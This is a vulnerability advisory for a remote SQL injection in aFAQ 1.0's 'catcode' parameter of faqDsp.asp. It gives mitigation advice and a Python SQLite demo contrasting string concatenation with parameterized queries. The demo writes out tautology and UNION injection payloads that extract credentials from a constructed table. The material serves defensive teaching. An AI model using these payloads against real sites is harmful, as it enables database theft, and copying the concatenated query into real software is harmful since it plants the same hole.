vendor: aFAQ
by: ajann
CVSS: 9 (HIGH)
Vulnerability Type: SQL Injection (CWE-89)
Product Name: aFAQ
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006
aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability
aFAQ 1.0 is vulnerable to a remote SQL injection vulnerability. The 'catcode' parameter of the 'faqDsp.asp' script is used in a database query without proper sanitization, so a remote attacker can inject SQL by supplying crafted input in that parameter in a request to faqDsp.asp. Successful exploitation lets the attacker read data from the back-end database, potentially including sensitive information, and, depending on the privileges of the database account the application uses, may allow further manipulation of the database.
Mitigation:
Build the database query with parameterized statements rather than concatenating the 'catcode' value into the SQL string; in classic ASP this means an ADODB.Command with bound parameters instead of string concatenation. In addition, validate 'catcode' against the expected format (an allow-list of permitted characters and length) before it is used, rather than trying to filter out quote characters. The application should also connect to the database with the least-privileged account it needs, so that a successful injection cannot read or modify tables beyond the FAQ data. No vendor patch is listed for this issue (Patch Exists: N/A).
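The following is an added example, not code from aFAQ or from the original advisory. It reproduces the concatenation pattern described above in Python over an in-memory SQLite database (the real faqDsp.asp is classic ASP and its table and column names are not known; the 'faq' and 'users' tables, the column names and the row contents below are constructed for the demo), shows two injected 'catcode' values reaching the database, and contrasts that with a parameterized query and an allow-list check on the parameter.

```python
import re
import sqlite3


def build_db():
    """Constructed sample schema: table and column names are assumptions
    for the demo, not aFAQ's real schema."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE faq (id INTEGER PRIMARY KEY, catcode TEXT, question TEXT)"
    )
    # Hypothetical table an attacker would want to read via injection.
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    con.executemany(
        "INSERT INTO faq (catcode, question) VALUES (?, ?)",
        [
            ("gen", "What is aFAQ?"),
            ("gen", "How do I add an FAQ?"),
            ("adm", "How do I reset the admin password?"),
        ],
    )
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con


def vulnerable_lookup(con, catcode):
    """Mirrors the string-building pattern the advisory describes:
    the raw 'catcode' request value is spliced into the SQL text."""
    sql = "SELECT question FROM faq WHERE catcode='" + catcode + "'"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con, catcode):
    """Hardened form: the driver sends catcode as a bound value, so
    quotes, OR clauses and UNIONs in it are data, never SQL."""
    sql = "SELECT question FROM faq WHERE catcode=?"
    return [row[0] for row in con.execute(sql, (catcode,))]


# Assumed format for a category code: short, alphanumeric/underscore only.
# An allow-list like this rejects injection payloads before they reach SQL.
CATCODE_RE = re.compile(r"[A-Za-z0-9_]{1,16}")


def is_valid_catcode(value):
    return CATCODE_RE.fullmatch(value) is not None


if __name__ == "__main__":
    con = build_db()
    # Tautology: returns every FAQ row regardless of category.
    print(vulnerable_lookup(con, "gen' OR '1'='1"))
    # UNION: pulls credentials out of an unrelated table.
    print(vulnerable_lookup(con, "' UNION SELECT username||':'||pwd FROM users--"))
    # Same payloads against the parameterized query match nothing.
    print(safe_lookup(con, "gen' OR '1'='1"))
    print(safe_lookup(con, "' UNION SELECT username||':'||pwd FROM users--"))
    print(is_valid_catcode("gen"), is_valid_catcode("gen' OR '1'='1"))
```

The parameterized version is the primary fix; the allow-list check is defence in depth and also keeps garbage out of error logs. Running the database connection as a low-privilege account, as the mitigation above recommends, would additionally prevent the UNION payload from reaching a table such as 'users' even if the concatenation were left in place.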